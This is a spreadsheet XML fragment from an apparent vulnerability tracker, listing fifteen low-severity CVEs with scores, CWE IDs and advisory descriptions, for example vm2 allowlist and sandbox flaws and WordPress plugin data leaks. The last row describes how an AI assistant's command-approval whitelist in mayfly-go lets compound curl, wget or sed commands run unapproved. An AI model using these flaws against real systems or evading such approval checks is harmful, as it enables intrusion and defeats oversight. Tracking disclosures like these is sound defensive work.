      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85716</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M376" s="5" t="inlineStr">
        <is>
          <t>3.0.12</t>
        </is>
      </c>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-390</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 3.0.8 until 3.0.12, processScramAuthenticationInfo and processAuthenticationInfo compute the SCRAM ServerSignature or Digest rspauth verification result but log a mismatch and still deliver the response as authenticated. On a non-TLS or compromised transport, a peer that has not proved knowledge of the shared secret can therefore be accepted as the server. The fix rejects a present invalid value and computes Digest rspauth from the Authorization parameters actually sent, but verification remains unenforced when the value is absent, the sent parameters cannot be recovered, or Digest uses qop=auth-int. This issue is fixed in version 3.0.12.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85716</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86446</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>The LearnPress  WordPress plugin before 4.4.7 does not restrict the correctness flags it returns when a quiz answer is checked, allowing unauthenticated attackers to obtain the correct answer to every option of a question, along with the instructor's explanation, on courses configured to be taken without enrolling.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86446</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91008</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>The Event Booking Manager for WooCommerce  WordPress plugin before 5.3.8 does not perform an ownership or authorization check before rendering booking confirmation details, allowing unauthenticated attackers to retrieve registered attendees' personal information (full name, email address, phone number, and custom registration fields) by supplying an enumerable booking reference. Exploitation is limited to sites configured to use the Event Booking Manager for WooCommerce  WordPress plugin before 5.3.8's native (non-WooCommerce) checkout, which is not the default.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91008</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91017</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>The Robokassa payment gateway for Woocommerce WordPress plugin before 1.8.9 does not verify the authenticity of incoming payment notifications when its non-default deferred-payment feature is enabled, allowing unauthenticated attackers to forge a notification and mark arbitrary WooCommerce orders as paid or on-hold without payment or a valid signature.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91017</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54471</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Dell SmartFabric Manager, versions prior to 2.2.1, contains an Improper Handling of Insufficient Permissions or Privileges vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54471</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45723</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-209, CWE-22, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.6.6 and 1.7.3, managementServer.CreateSchematic in internal/backend/grpc/schematics.go passes the caller-controlled TalosVersion field to imageFactoryClient.OverlaysVersions without validating it as a version. An authenticated Operator can submit traversal segments in TalosVersion, and url.URL.JoinPath normalizes them into unintended paths on the configured image-factory host. Omni then issues HTTP GET requests to those paths and reflects error-body content, enabling same-host endpoint probing and possible disclosure of internal diagnostics while preventing redirection to another host or write requests. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45723</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50607</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. A WebSocket service was configured to listen on all network interfaces, which may expose the service to unintended network access.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50607</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87836</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>The Comments Import &amp; Export WordPress plugin before 2.5.4 does not restrict its comment export to users able to moderate comments, nor scope the export to content owned by the requesting user, allowing users with the Author role and above to retrieve every comment on the site, including commenter email addresses, IP addresses, unapproved comment content and comment meta.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87836</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75588</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>2.6</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-1287</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>Mattermost Desktop App versions &lt;=6.2 6.2.2.0 fail to validate the URL scheme when checking whether a target URL is internal to the connected server, which allows a network-positioned attacker to load a plugin popout window over an insecure connection via a link using a downgraded URL scheme. Mattermost Advisory ID: MMSA-2026-00717</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75588</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54579</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-345</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, ping() in libmport/ping.c accepted ICMP replies without validating icmp_id or icmp_seq and parsed the reply using a fixed IP-header offset instead of ip_hl. A network attacker able to inject or spoof visible ICMP replies could influence mirror latency selection, while a malformed packet carrying IP options could shift the ICMP header and trigger an out-of-bounds read. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54579</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81637</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Insufficient Session Expiration vulnerability in team-alembic AshAuthentication allows an attacker who obtains a victim's OAuth2 state value to replay the callback and sign that victim into an attacker-controlled account.
AshAuthentication.Strategy.OAuth2.Plug.callback/2 clears the stored session_params through a rebinding step inside its with chain, conn &lt;- delete_session(conn, session_key). Elixir evaluates the else block in the scope enclosing the with, so every failure path (the provider returning ?error=access_denied, an invalid code, a token-exchange error, or a registration or sign-in failure) reaches store_authentication_result/2 holding the original connection and the session entry is never removed. The value the module's own comment describes as protection against a CSRF-related attack is therefore consumed only when authentication succeeds, and survives a cancelled or failed attempt until the next request phase or session expiry.
This issue affects ash_authentication: from 0.6.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81637</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92945</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a module allowlist bypass vulnerability in isPathAllowedForModule that uses raw string prefix matching instead of boundary-anchored comparison. Attackers can reach non-allowlisted packages sharing a prefix with allowlisted modules by performing relative requires from allowlisted packages when transitive loading is disabled.</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92945</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54649</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>punchin-email is a Cloudflare Email Worker that provides two-way role aliases while relaying mail to a private inbox. Prior to 1.5.0, handleInbound delivers inbound alias mail with message.forward(), which silently drops the added Reply-To header intended to route responses through the relay. When a correspondent sends mail to an alias and the operator replies, the mail client can send directly to the correspondent from the private FORWARD_TO inbox address, exposing that address. The disclosure is limited to the operator's own email address and does not expose third-party data or provide code execution or authentication bypass. This issue is fixed in version 1.5.0.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54649</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92962</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox for running untrusted JavaScript. In vm2 versions up to and including 3.11.3, the defaultSandboxPrepareStackTrace function in lib/setup-sandbox.js builds its output array using prototype-walking index assignment (lines[lines.length] = value) rather than a prototype-bypassing define-property primitive. Because this bridge-internal array is allocated in the sandbox realm, code inside the sandbox can install an accessor on Array.prototype for the relevant index; the accessor is then invoked whenever the sandbox reads error.stack (or otherwise triggers Error.prepareStackTrace), allowing sandbox code to observe and intercept each stack-trace line written by the bridge. The same pattern is used in the error-handling (catch) branch. The values written are formatted strings only, so the practical impact is limited to an information side channel and a violation of vm2's bridge-container defense invariant rather than a sandbox escape; the vendor rates the issue Low. The issue is fixed in vm2 3.11.4, which installs each entry as an own data property via Reflect.defineProperty.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92962</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92992</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Dromara mayfly-go up to 1.11.5. The affected element is an unknown function of the file server/internal/ai/api/ai.go of the component AI Assistant. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The identifier of the patch is 74bcb926eb4f5f94e7681144d7bf2168a0ec7cde. Applying a patch is the recommended action to fix this issue. The whitelist bypass is one-token wide. Any compound command containing curl, wget or sed auto-runs without approval; approval is granted by the same session user (self-approval). This issue got fixed with a silent patch.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92992</t>
        </is>
